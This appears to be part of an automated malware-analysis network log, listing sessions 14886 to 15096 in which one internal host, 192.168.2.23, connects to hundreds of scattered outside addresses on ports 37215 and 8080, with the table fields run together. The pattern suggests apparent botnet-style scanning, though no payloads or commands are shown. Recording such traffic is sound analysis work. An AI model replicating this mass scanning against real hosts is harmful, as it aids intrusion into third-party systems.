                                                        14886192.168.2.2359166157.152.97.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14887192.168.2.2343144151.174.110.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14888192.168.2.2356176157.109.250.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14889192.168.2.234425441.14.225.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14890192.168.2.235411041.79.123.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14891192.168.2.234919044.24.120.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14892192.168.2.234806641.94.207.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14893192.168.2.235969841.116.53.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14894192.168.2.2347280157.119.244.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14895192.168.2.233617882.22.35.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14896192.168.2.2349768140.65.236.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14897192.168.2.2353384175.205.0.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14898192.168.2.234123818.215.190.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14899192.168.2.2348600197.107.75.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14900192.168.2.235662641.226.240.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14901192.168.2.2351196157.27.241.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14902192.168.2.2353984157.174.17.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14903192.168.2.234722841.238.119.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14904192.168.2.2350460197.125.173.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14905192.168.2.2350974197.10.100.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14906192.168.2.2356588197.99.208.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14907192.168.2.2338948197.95.161.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14908192.168.2.235942441.169.235.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14909192.168.2.235832641.244.127.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14910192.168.2.2345080175.37.116.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14911192.168.2.2336472209.31.121.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14912192.168.2.2355818101.172.232.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14913192.168.2.235518441.240.215.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14914192.168.2.233587841.146.151.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14915192.168.2.235476834.255.193.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14916192.168.2.2339240157.134.160.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14917192.168.2.2357518188.136.5.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14918192.168.2.2345824157.249.233.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14919192.168.2.2346512197.247.174.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14920192.168.2.234891441.239.146.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14921192.168.2.2356772197.246.154.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14922192.168.2.2351650157.140.85.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14923192.168.2.234659441.187.249.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14924192.168.2.233367241.130.95.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14925192.168.2.2359342189.241.186.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14926192.168.2.234551023.224.215.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14927192.168.2.2332792157.48.151.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14928192.168.2.2349180157.44.91.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14929192.168.2.2346394156.193.220.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14930192.168.2.2336302157.175.227.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14931192.168.2.2359190157.21.175.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14932192.168.2.2334478197.188.33.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14933192.168.2.2349490157.20.122.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14934192.168.2.234879841.183.37.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14935192.168.2.2359828157.249.111.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14936192.168.2.235528241.154.217.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14937192.168.2.2341110166.180.224.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14938192.168.2.234211641.127.78.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14939192.168.2.233940841.39.11.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14940192.168.2.2357202105.25.223.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14941192.168.2.2339160110.125.100.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14942192.168.2.234895841.120.93.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14943192.168.2.2358240197.76.109.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14944192.168.2.2341118192.178.113.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14945192.168.2.235911441.127.167.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14946192.168.2.2347178197.116.237.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14947192.168.2.233829441.42.43.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14948192.168.2.2334682107.215.159.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14949192.168.2.234807241.199.40.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14950192.168.2.2355344157.235.95.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14951192.168.2.233712841.157.253.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14952192.168.2.234059441.177.79.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14953192.168.2.2348288157.164.87.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14954192.168.2.2357100118.61.92.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14955192.168.2.233824866.53.211.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14956192.168.2.2349828197.77.37.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14957192.168.2.236089262.15.52.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14958192.168.2.235837880.140.195.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14959192.168.2.234375441.95.222.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14960192.168.2.235451441.61.214.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14961192.168.2.2348972157.168.253.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14962192.168.2.2343768197.240.6.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14963192.168.2.2336812157.128.113.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14964192.168.2.2360810157.112.69.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14965192.168.2.235095066.208.2.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14966192.168.2.233662275.232.241.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14967192.168.2.2349268122.242.60.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14968192.168.2.2359702159.75.199.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14969192.168.2.234797661.123.23.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14970192.168.2.2337230180.199.37.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14971192.168.2.235435654.137.10.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14972192.168.2.2344972182.166.154.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14973192.168.2.235899020.61.36.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14974192.168.2.2333994158.179.175.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14975192.168.2.2344474154.239.253.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14976192.168.2.233777039.47.79.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14977192.168.2.233328223.172.182.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14978192.168.2.2346454128.83.160.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14979192.168.2.2348988147.34.148.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14980192.168.2.2358140184.197.182.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14981192.168.2.2350592136.224.228.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14982192.168.2.23545408.252.109.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14983192.168.2.2354990105.165.108.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14984192.168.2.2358216108.251.11.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14985192.168.2.235222286.160.128.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14986192.168.2.234998214.140.184.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14987192.168.2.2340270148.248.109.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14988192.168.2.2348866123.239.8.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14989192.168.2.2337852114.232.117.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14990192.168.2.235818495.22.57.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14991192.168.2.234410240.25.112.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14992192.168.2.2359792129.89.38.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14993192.168.2.2358542219.221.249.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14994192.168.2.2337392165.60.81.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14995192.168.2.2337462149.192.70.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14996192.168.2.234601240.0.168.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14997192.168.2.234254219.62.112.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14998192.168.2.2354688138.135.231.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14999192.168.2.2335636123.43.138.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15000192.168.2.2337668146.243.122.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15001192.168.2.2353202180.247.93.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15002192.168.2.234135231.102.219.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15003192.168.2.235378899.242.246.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15004192.168.2.2345856191.193.40.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15005192.168.2.235137693.119.72.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15006192.168.2.2338678180.232.95.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15007192.168.2.2352280129.97.183.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15008192.168.2.233518480.45.56.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15009192.168.2.23465321.240.67.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15010192.168.2.2339108211.165.129.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15011192.168.2.2338650169.93.113.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15012192.168.2.2352720213.195.177.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15013192.168.2.234024027.111.180.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15014192.168.2.235283895.229.61.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15015192.168.2.23381521.71.237.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15016192.168.2.234291276.241.66.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15017192.168.2.235949458.98.164.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15018192.168.2.234656646.154.60.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15019192.168.2.2352762147.105.28.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15020192.168.2.2344294132.150.76.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15021192.168.2.2357906179.25.132.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15022192.168.2.2355464183.175.18.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15023192.168.2.234715899.15.230.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15024192.168.2.2343958133.254.64.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15025192.168.2.2349736125.0.104.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15026192.168.2.234837079.116.59.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15027192.168.2.236094688.94.224.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15028192.168.2.2351414220.211.254.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15029192.168.2.235852659.102.233.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15030192.168.2.2357974203.85.23.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15031192.168.2.236075859.16.240.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15032192.168.2.23605225.87.121.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15033192.168.2.234173259.12.165.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15034192.168.2.2335434219.179.72.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15035192.168.2.2347778124.24.207.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15036192.168.2.2351024166.198.161.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15037192.168.2.235348045.109.20.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15038192.168.2.234093282.200.10.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15039192.168.2.235837059.13.97.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15040192.168.2.2337956199.60.107.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15041192.168.2.233897645.128.145.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15042192.168.2.235184292.168.170.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15043192.168.2.2334058122.181.61.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15044192.168.2.2336296196.25.189.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15045192.168.2.235411852.204.54.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15046192.168.2.2353620129.147.45.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15047192.168.2.2355320218.174.192.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15048192.168.2.2341514196.238.255.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15049192.168.2.2352502223.182.80.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15050192.168.2.233915861.24.132.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15051192.168.2.23608401.150.246.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15052192.168.2.2359364108.168.54.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15053192.168.2.235863012.87.96.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15054192.168.2.2358316179.107.134.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15055192.168.2.2359604163.35.217.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15056192.168.2.2351036122.112.124.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15057192.168.2.2349368118.1.252.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15058192.168.2.2349046219.171.140.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15059192.168.2.234865864.62.150.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15060192.168.2.2348344110.204.45.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15061192.168.2.233289499.139.240.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15062192.168.2.233605042.192.112.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15063192.168.2.235080223.164.52.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15064192.168.2.2342422154.1.129.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15065192.168.2.2336428202.38.183.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15066192.168.2.234323867.124.74.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15067192.168.2.233695294.96.90.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15068192.168.2.235336651.118.45.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15069192.168.2.2338532174.207.60.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15070192.168.2.2347114145.211.20.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15071192.168.2.235893836.251.70.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15072192.168.2.2335438103.127.82.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15073192.168.2.233305432.243.60.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15074192.168.2.2355860138.145.107.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15075192.168.2.2357480148.115.95.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15076192.168.2.2343086181.235.160.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15077192.168.2.2347764101.8.78.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15078192.168.2.234711275.8.206.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15079192.168.2.2349466116.185.48.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15080192.168.2.235424060.10.57.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15081192.168.2.23495525.120.37.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15082192.168.2.2358258221.228.253.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15083192.168.2.236041880.164.83.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15084192.168.2.2338184198.69.196.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15085192.168.2.2357990119.7.219.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15086192.168.2.2337430142.162.60.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15087192.168.2.2333338217.65.239.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15088192.168.2.2342536110.215.28.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15089192.168.2.2345948210.104.149.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15090192.168.2.2360396130.81.201.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15091192.168.2.2349526178.34.38.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15092192.168.2.2335002222.212.96.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15093192.168.2.2355214193.183.84.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15094192.168.2.233907274.150.166.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15095192.168.2.2353328119.80.211.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15096192.168.2.2350256195.50.52.2348080
